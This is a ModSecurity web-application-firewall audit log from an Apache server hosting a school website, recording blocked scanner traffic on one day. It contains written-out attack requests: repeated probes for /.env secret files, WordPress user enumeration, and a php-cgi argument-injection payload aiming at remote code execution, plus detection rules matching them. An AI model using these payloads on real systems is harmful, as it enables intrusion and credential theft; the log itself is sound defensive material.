smkn22-jkt.sch.id X-Forwarded-For: 85.195.247.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cd5c2067-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd5c2067-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748226591122164 3065 (- - -) Stopwatch2: 1748226591122164 3065; combined=1338, p1=477, p2=832, p3=0, p4=0, p5=29, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd5c2067-Z-- --c801e425-A-- [26/May/2025:09:45:10 +0700] aDPVts-W3hHsdQpQwdT0mgAAANY 103.236.140.4 57416 103.236.140.4 8181 --c801e425-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --c801e425-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c801e425-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748227510823261 860 (- - -) Stopwatch2: 1748227510823261 860; combined=345, p1=301, p2=0, p3=0, p4=0, p5=43, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c801e425-Z-- --6f526644-A-- [26/May/2025:10:21:45 +0700] aDPeSc-W3hHsdQpQwdT0yQAAAM0 103.236.140.4 57720 103.236.140.4 8181 --6f526644-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.231.115.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.231.115.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6f526644-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f526644-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748229705081728 3118 (- - -) Stopwatch2: 1748229705081728 3118; combined=1372, p1=444, p2=892, p3=0, p4=0, p5=35, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f526644-Z-- --2db95401-A-- [26/May/2025:10:31:16 +0700] aDPghM-W3hHsdQpQwdT00AAAAMU 103.236.140.4 57764 103.236.140.4 8181 --2db95401-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.130.232.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.130.232.23 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2db95401-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2db95401-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748230276669255 3518 (- - -) Stopwatch2: 1748230276669255 3518; combined=1499, p1=473, p2=994, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2db95401-Z-- --3f3f4a57-A-- [26/May/2025:10:36:45 +0700] aDPhzVSmKJQK-9oQ9SRVRwAAAIQ 103.236.140.4 57776 103.236.140.4 8181 --3f3f4a57-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 162.243.233.172 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 162.243.233.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --3f3f4a57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f3f4a57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748230605412440 795 (- - -) Stopwatch2: 1748230605412440 795; combined=317, p1=278, p2=0, p3=0, p4=0, p5=39, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f3f4a57-Z-- --7bf2803a-A-- [26/May/2025:10:42:14 +0700] aDPjFlSmKJQK-9oQ9SRVWgAAAII 103.236.140.4 57840 103.236.140.4 8181 --7bf2803a-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 134.122.28.88 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 134.122.28.88 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --7bf2803a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bf2803a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748230934070734 828 (- - -) Stopwatch2: 1748230934070734 828; combined=345, p1=319, p2=0, p3=0, p4=0, p5=26, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bf2803a-Z-- --a70e414e-A-- [26/May/2025:10:52:14 +0700] aDPlbnFOzWd_Ai7zJXXaHQAAAA4 103.236.140.4 58082 103.236.140.4 8181 --a70e414e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 64.227.104.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 64.227.104.105 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a70e414e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a70e414e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748231534317147 2846 (- - -) Stopwatch2: 1748231534317147 2846; combined=1295, p1=433, p2=833, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a70e414e-Z-- --83ac5a65-A-- [26/May/2025:11:13:23 +0700] aDPqY1SmKJQK-9oQ9SRVagAAAIA 103.236.140.4 58320 103.236.140.4 8181 --83ac5a65-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.83.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.83.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.1 SUSE/6.0.428.0 (KHTML, like Gecko) Chrome/6.0.428.0 Safari/534.1 Accept-Charset: utf-8 --83ac5a65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83ac5a65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748232803409210 879 (- - -) Stopwatch2: 1748232803409210 879; combined=347, p1=306, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83ac5a65-Z-- --ef16b635-A-- [26/May/2025:12:20:36 +0700] aDP6JM-W3hHsdQpQwdT1MAAAANY 103.236.140.4 58844 103.236.140.4 8181 --ef16b635-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 157.245.113.227 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 157.245.113.227 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --ef16b635-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ef16b635-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748236836013849 725 (- - -) Stopwatch2: 1748236836013849 725; combined=274, p1=247, p2=0, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef16b635-Z-- --f5a9be5c-A-- [26/May/2025:12:47:34 +0700] aDQAdnFOzWd_Ai7zJXXbMAAAAAA 103.236.140.4 60558 103.236.140.4 8181 --f5a9be5c-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 46.101.111.185 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 46.101.111.185 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --f5a9be5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f5a9be5c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748238454447208 840 (- - -) Stopwatch2: 1748238454447208 840; combined=332, p1=291, p2=0, p3=0, p4=0, p5=40, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f5a9be5c-Z-- --d756783e-A-- [26/May/2025:13:13:31 +0700] aDQGi3FOzWd_Ai7zJXXtKgAAABA 103.236.140.4 39198 103.236.140.4 8181 --d756783e-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --d756783e-C-- --d756783e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d756783e-E-- --d756783e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748240011656189 4758 (- - -) Stopwatch2: 1748240011656189 4758; combined=3019, p1=495, p2=2476, p3=0, p4=0, p5=47, sr=75, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d756783e-Z-- --dbe3e315-A-- [26/May/2025:13:21:26 +0700] aDQIZlSmKJQK-9oQ9SRrhQAAAJQ 103.236.140.4 49164 103.236.140.4 8181 --dbe3e315-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --dbe3e315-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dbe3e315-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748240486453168 810 (- - -) Stopwatch2: 1748240486453168 810; combined=303, p1=268, p2=0, p3=0, p4=0, p5=35, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbe3e315-Z-- --662e9022-A-- [26/May/2025:13:29:37 +0700] aDQKUc-W3hHsdQpQwdQSGAAAANg 103.236.140.4 59654 103.236.140.4 8181 --662e9022-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 167.99.181.249 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 167.99.181.249 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --662e9022-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --662e9022-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748240977209394 805 (- - -) Stopwatch2: 1748240977209394 805; combined=322, p1=281, p2=0, p3=0, p4=0, p5=41, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --662e9022-Z-- --7acde368-A-- [26/May/2025:15:01:14 +0700] aDQfyv7lSIOiZEhmvSz_awAAAEI 103.236.140.4 47374 103.236.140.4 8181 --7acde368-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --7acde368-C-- --7acde368-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7acde368-E-- --7acde368-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748246474221641 3685 (- - -) Stopwatch2: 1748246474221641 3685; combined=2370, p1=438, p2=1897, p3=0, p4=0, p5=35, sr=111, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7acde368-Z-- --b6eb7950-A-- [26/May/2025:15:08:09 +0700] aDQhaXFOzWd_Ai7zJXVKfAAAAAU 103.236.140.4 37092 103.236.140.4 8181 --b6eb7950-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.46.149 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.46.149 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --b6eb7950-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6eb7950-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748246889122514 588 (- - -) Stopwatch2: 1748246889122514 588; combined=221, p1=193, p2=0, p3=0, p4=0, p5=28, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6eb7950-Z-- --64f80333-A-- [26/May/2025:16:40:21 +0700] aDQ3BVSmKJQK-9oQ9SQvJwAAAIU 103.236.140.4 52592 103.236.140.4 8181 --64f80333-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept-Charset: utf-8 --64f80333-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64f80333-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748252421773286 734 (- - -) Stopwatch2: 1748252421773286 734; combined=294, p1=258, p2=0, p3=0, p4=0, p5=36, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64f80333-Z-- --21cd572e-A-- [26/May/2025:16:40:33 +0700] aDQ3Ec-W3hHsdQpQwdTXmgAAAMk 103.236.140.4 52914 103.236.140.4 8181 --21cd572e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 Accept-Charset: utf-8 --21cd572e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21cd572e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748252433052334 710 (- - -) Stopwatch2: 1748252433052334 710; combined=289, p1=255, p2=0, p3=0, p4=0, p5=34, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21cd572e-Z-- --01a2bf36-A-- [26/May/2025:17:15:27 +0700] aDQ_P8-W3hHsdQpQwdTyTAAAANU 103.236.140.4 54624 103.236.140.4 8181 --01a2bf36-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (X11; Linux i686; rv:2.0b10) Gecko/20100101 Firefox/4.0b10 --01a2bf36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01a2bf36-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254527753094 3905 (- - -) Stopwatch2: 1748254527753094 3905; combined=552, p1=448, p2=0, p3=0, p4=0, p5=104, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01a2bf36-Z-- --8e6be64a-A-- [26/May/2025:17:15:28 +0700] aDQ_QFSmKJQK-9oQ9SRLLQAAAII 103.236.140.4 54634 103.236.140.4 8181 --8e6be64a-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; LG-VS410PP Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 --8e6be64a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e6be64a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted 